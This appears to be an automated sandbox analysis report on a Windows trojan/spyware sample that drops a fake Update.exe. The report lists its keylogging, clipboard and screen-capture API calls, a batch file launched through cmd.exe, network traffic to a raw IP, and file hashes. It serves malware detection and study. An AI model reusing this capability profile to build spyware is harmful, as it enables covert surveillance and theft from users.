Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61
Source: unknown	TCP traffic detected without corresponding DNS query: 137.220.229.61

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F3360 recv,timeGetTime,_memmove,

3_2_037F3360

Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000011.00000002.2561978366.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000011.00000002.2573835228.0000000007100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microk
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Uulw5M1DfU.exe, 00000000.00000003.1745113958.0000000000910000.00000004.00001000.00020000.00000000.sdmp, Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: http://www.ijg.org
Source: powershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsofD
Source: powershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsofDSCResources55h
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://ldapi.ldmnq.com/common/baidu/ocpc
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://ldapi.ldmnq.com/common/baidu/ocpcbaidu
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://ldapi.ldmnq.com/mnq/properties?openid=&packageName=https://encdn.ldmnq.com/player_files/open
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://middledata.ldmnq.com/collection/biz/upload
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://middledata.ldmnq.com/collection/biz/uploadreport
Source: powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://res.ldmnq.com/ld/leidianexhttps://res.ldmnq.com/download/release/ldinst4.0.exehttps://res.ld
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepost
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.dr	String found in binary or memory: https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typ

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: [esc]	3_2_037FE850
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: [esc]	3_2_037FE850
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: [esc]	3_2_037FE850
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: [esc]	3_2_037FE850

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037FE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,

3_2_037FE850

Source: C:\Users\Public\Bilite\Axialis\Update.exe

3_2_037FE850

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037FBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,

3_2_037FBC70

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037FE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,

3_2_037FE4F0

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_6CA86EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,

3_2_6CA86EB0

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037FB463 ExitWindowsEx,	3_2_037FB463
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037FB43F ExitWindowsEx,	3_2_037FB43F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037FB41B ExitWindowsEx,	3_2_037FB41B

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_00404FAA	0_2_00404FAA
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_0041206B	0_2_0041206B
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_0041022D	0_2_0041022D
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: 0_2_00411F91	0_2_00411F91
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F6EE0	3_2_037F6EE0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F6C50	3_2_037F6C50
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03808381	3_2_03808381
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0380E341	3_2_0380E341
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0380EA1D	3_2_0380EA1D
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F8900	3_2_037F8900
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0380F9FF	3_2_0380F9FF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0380D89F	3_2_0380D89F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0380DDF0	3_2_0380DDF0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F24B0	3_2_037F24B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA87E80	3_2_6CA87E80
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92576	3_2_6CA92576
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAA0D62	3_2_6CAA0D62
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAB2ED3	3_2_6CAB2ED3
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAA58B0	3_2_6CAA58B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92870	3_2_6CA92870
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92A4B	3_2_6CA92A4B
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA9DBA0	3_2_6CA9DBA0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92BC6	3_2_6CA92BC6
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAB7502	3_2_6CAB7502
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA9C515	3_2_6CA9C515
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92638	3_2_6CA92638
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA87640	3_2_6CA87640
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA957A0	3_2_6CA957A0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CA92771	3_2_6CA92771
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_6CAA6234	3_2_6CAA6234
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_1001122F	3_2_1001122F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_100024B0	3_2_100024B0
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10010CDE	3_2_10010CDE
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10012D91	3_2_10012D91
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10011E5C	3_2_10011E5C
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_1000B66A	3_2_1000B66A
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_10011780	3_2_10011780
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C70032	3_2_00C70032
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C81206	3_2_00C81206
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C72487	3_2_00C72487
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C80CB5	3_2_00C80CB5
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C82D68	3_2_00C82D68
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C7B641	3_2_00C7B641
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_00C81757	3_2_00C81757
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0368F3BE	3_2_0368F3BE
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0368D25E	3_2_0368D25E
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_036782BF	3_2_036782BF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0367689F	3_2_0367689F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0368D7AF	3_2_0368D7AF
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03671E6F	3_2_03671E6F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0367660F	3_2_0367660F
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_03687D40	3_2_03687D40
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_0368DD00	3_2_0368DD00

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Bilite\Axialis\Update.exe 0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: String function: 03804300 appears 31 times
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: String function: 6CA9C970 appears 53 times
Source: C:\Users\user\Desktop\Uulw5M1DfU.exe	Code function: String function: 0040243B appears 37 times

Source: Uulw5M1DfU.exe

Static PE information: invalid certificate

Source: ldplayer9_ld_6000_ld.exe.0.dr

Static PE information: Resource name: ZIPRES type: 7-zip archive data, version 0.4

Source: Uulw5M1DfU.exe, 00000000.00000003.1666390584.000000000243D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe, 00000000.00000003.1666390584.000000000243D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe, 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe, 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAxII> vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdate.exe vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe	Binary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs Uulw5M1DfU.exe
Source: Uulw5M1DfU.exe	Binary or memory string: OriginalFilename7zSfxNew.exe< vs Uulw5M1DfU.exe

Source: Uulw5M1DfU.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@43/29@0/1

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00407776

Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F7B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	3_2_037F7B70
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F7740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	3_2_037F7740
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Code function: 3_2_037F7620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,	3_2_037F7620

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,

0_2_0040118A

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Code function: 3_2_037F6050 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle,

3_2_037F6050

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_004034C1

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Code function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

0_2_00401BDF

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

File created: C:\Users\Public\Bilite

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Users\Public\Bilite\Axialis\Update.exe	Mutant created: \Sessions\1\BaseNamedObjects\2024.12.13
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03

Source: C:\Users\Public\Bilite\Axialis\Update.exe

File created: C:\Users\user\AppData\Local\Temp\monitor.bat

Jump to behavior

Source: C:\Users\Public\Bilite\Axialis\Update.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"

Source: Uulw5M1DfU.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UPDATE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UPDATE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UPDATE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'UPDATE.EXE'

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Uulw5M1DfU.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\Uulw5M1DfU.exe

File read: C:\Users\user\Desktop\Uulw5M1DfU.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Uulw5M1DfU.exe "C:\Users\user\Desktop\Uulw5M1DfU.exe"
